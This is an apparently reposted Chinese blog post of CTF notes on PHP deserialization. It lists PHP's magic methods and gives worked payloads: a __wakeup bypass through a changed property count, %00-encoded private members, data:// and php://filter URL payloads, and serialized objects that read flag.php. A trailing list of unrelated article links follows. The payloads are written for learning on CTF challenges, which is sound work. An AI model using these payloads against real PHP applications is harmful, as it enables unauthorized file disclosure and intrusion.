当前位置：首页 > news >正文

序列化,反序列化之实例

news 2026/2/7 12:47:01

别怕，我一直陪着你

一.知识
- 1.魔术方法
二.实例
- 1.绕过__wakeup, private
- 2.php://filter, data://, __tostring
- 3.

一.知识

1.魔术方法

__construct() 当一个对象创建时自动调用
__destruct() 当对象被销毁时自动调用 (php绝大多数情况下会自动调用销毁对象)
__sleep() 使**用serialize()函数时触发
__wakeup 使用unserialse()**函数时会自动调用
__toString 当一个对象被当作一个字符串被调用一
__call() 在对象上下文中调用不可访问的方法时触发
__callStatic() 在静态上下文中调用不可访问的方法时触发
__get() 用于从不可访问的属性读取数据//调用私有属性时使用
__set() 用于将数据写入不可访问的属性
__isset() 在不可访问的属性上调用isset()或empty()触发
__unset() 在不可访问的属性上使用unset()时触发
__toString() 把类当作字符串使用时触发,返回值需要为字符串
__invoke() 当脚本尝试将对象调用为函数时触发

二.实例

1.绕过__wakeup, private

①脚本

<?php
class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}
}$a = new Name('admin', 100);
$b = serialize($a);
var_dump($b);

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

②调用unserialize()时会自动调用魔法函数wakeup(),可以通过改变属性数绕过，把Name后面的2改为3或以上即可

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

③因为成员（属性）是private，所以要在类名和成员名前加%00这个url编码是空的意思。因为生产序列化时不会把这个空也输出。

O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

2.php://filter, data://, __tostring

①file_get_contents的作用是将整个文件读入一个字符串

这里将text文件中读取字符串，还要和welcome to the zjctf相等

这里使用的是data://写入协议

?text=data://text/plain,welcome to the zjctf

②源码提示了useless.php这里使用php伪协议来读取文件

php://filter/read=convert.base64-encode/resource=useless.php

③第一个payload

?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

④脚本

<?php
class Flag{  //flag.php  public $file='flag.php';  public function __tostring(){if(isset($this->file)){ echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  
}  
$a = new Flag();
echo serialize($a);

⑤第二个payload

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

不加伪协议了， flie还得正确地写

3.

_destruct()方法会把op的值改为1，这里需要绕过一下，在2前面加一个空格即可，op= 2

脚本

<?php
class FileHandler {public $op = ' 2';public $filename = 'flag.php';public $content = '';
}
$a = new FileHandler();
echo serialize($a);
?>

序列化,反序列化之实例

别怕，我一直陪着你

一.知识

1.魔术方法

二.实例

1.绕过__wakeup, private

2.php://filter, data://, __tostring

3.

相关文章：

序列化,反序列化之实例

2022年全国职业院校技能大赛（高职组）“软件测试”赛项竞赛任务书

第18节：R语言分析:临床安全性数据的数据分析

36.悬浮板

BLE基础理论/Android BLE开发示例

rocketmq 5.13任意时间延迟消息

小程序picker 在苹果手机不兼容 bug，按month时在iPhone 显示不正确及自动定位时间问题

区块链服务网络的顶层设计与应用实践

tomcat日志输出乱码

Form1单例模式与互斥锁

MySQL | 常用命令示例

常见网关对比

机器学习动量优化算法笔记

asp.net与asp.net优缺点及示例

php 年月日分组分页

flutter开发实战-请求dio设置Cookie

C语言第十一课--------操作符的使用与分类-------基本操作

2，继承、内联函数、虚继承、友元、构造析构函数、初始化列表

Mkdocs中利用Js实现大小圈鼠标拖动样式

pytorch（6）——神经网络基本骨架nn.module的使用

SpringBoot-17-MyBatis动态SQL标签之常用标签

云原生核心技术 (7/12): K8s 核心概念白话解读(上)：Pod 和 Deployment 究竟是什么？

大话软工笔记—需求分析概述

简易版抽奖活动的设计技术方案

React第五十七节 Router中RouterProvider使用详解及注意事项

【位运算】消失的两个数字（hard）

高频面试之3Zookeeper

基础测试工具使用经验

第25节 Node.js 断言测试

基于Docker Compose部署Java微服务项目